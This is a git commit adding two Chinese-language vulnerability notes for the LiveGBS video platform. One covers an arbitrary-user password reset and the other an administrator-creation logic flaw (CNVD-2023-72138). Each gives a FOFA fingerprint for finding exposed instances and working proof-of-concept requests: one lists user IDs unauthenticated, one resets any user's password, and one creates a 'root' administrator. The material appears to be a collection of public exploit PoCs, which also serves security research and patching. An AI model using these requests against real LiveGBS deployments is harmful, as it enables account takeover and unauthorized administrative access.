整理文件
This commit is contained in:
33
LiveGBS/LiveGBS任意用户密码重置漏洞.md
Normal file
33
LiveGBS/LiveGBS任意用户密码重置漏洞.md
Normal file
@@ -0,0 +1,33 @@
|
||||
# LiveGBS任意用户密码重置漏洞
|
||||
|
||||
LiveGBS部分接口存在未授权访问导致,可以通过组合漏洞修改任意用户密码
|
||||
|
||||
## fofa
|
||||
|
||||
```yaml
|
||||
icon_hash="-206100324"
|
||||
```
|
||||
|
||||
## poc
|
||||
|
||||
### 获取用户id
|
||||
|
||||
```
|
||||
/api/v1/user/list?q=&start=&limit=10&enable=&sort=CreatedAt&order=desc
|
||||
```
|
||||
|
||||

|
||||
|
||||
### 通过id更改用户密码
|
||||
|
||||
```
|
||||
/api/v1/user/resetpassword?id=22&password=123456
|
||||
```
|
||||
|
||||

|
||||
|
||||
|
||||
|
||||
## 漏洞来源
|
||||
|
||||
- https://mp.weixin.qq.com/s/6To5_MA83i7rEfrxlqNpAQ
|
||||
18
LiveGBS/LiveGBS存在逻辑缺陷漏洞(CNVD-2023-72138).md
Normal file
18
LiveGBS/LiveGBS存在逻辑缺陷漏洞(CNVD-2023-72138).md
Normal file
@@ -0,0 +1,18 @@
|
||||
## LiveGBS存在逻辑缺陷漏洞(CNVD-2023-72138)
|
||||
|
||||
## fofa
|
||||
```
|
||||
icon_hash="-206100324"
|
||||
```
|
||||
|
||||
|
||||
## poc
|
||||
```
|
||||
GET /api/v1/user/save?ID=&Username=root&Role=%E7%AE%A1%E7%90%86%E5%91%98&Enable=true HTTP/1.1
|
||||
Host:
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
|
||||
Connection: close
|
||||
|
||||
```
|
||||
|
||||

|
||||
Reference in New Issue
Block a user